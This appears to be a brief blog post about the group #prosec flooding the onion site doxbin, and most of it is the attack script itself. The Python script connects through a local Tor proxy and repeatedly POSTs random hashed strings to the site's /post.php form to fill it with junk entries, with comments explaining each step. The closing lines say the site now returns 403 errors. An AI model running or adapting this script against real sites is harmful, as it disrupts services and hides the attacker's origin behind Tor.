Looks like #prosec is nerdraging on @doxbin. The effects can be seen here. The attack I noticed first was a semi-lame HTTP POST attack that floods doxbin with garbage “dox”. Code here:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

#!/usr/bin/python

import socks
#google it, it's a common python extension
import socket
#127.0.0.1:9050 is the default TOR socks4 proxy
#this connects to TOR
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, "127.0.0.1", 9050)
socket.socket = socks.socksocket
from httplib import *
from urllib import *
import random
import time
import hashlib

times = 1
while 1:
	############DOX############
	doxrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
	dox = hashlib.sha224(doxrand).hexdigest()
	print dox
	#doxrand = picking a random character
	#dox = SHA hashing of the random character defined in doxrand
	##############NAEM###########
	naemrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
	naem = hashlib.sha224(naemrand).hexdigest()
	print naem
	#same as above
	##############

	connection = HTTPConnection("doxbinumfxfyytnh.onion")
	#establishing HTTP conenction to website
	head = {"Content-Type" : "application/x-www-form-urlencoded", "Accept" : "text/plain"}
	#constructing the header, so the webserver will respond properly
	parameters = urlencode({"naem" : naem, "dox" : dox})
	#defining the data to be used during POST, note naem and dox refer to the random strings from ealier
	#they must correspond to the ID fields from the web form, otherwise..it won't work
	connection.request("POST", "/post.php", parameters, head)
	#pushing the data to the post function of the php file
	print 'Connection OK...Continuing..'
	print 'Spammed', 
	print times, 
	print 'times!'
	times = times + 1
	time.sleep(30) #in seconds
	#self explanitory

Now, however, it looks like there are 403 Forbidden errors. I’m thinking Nachash will get things running again soon.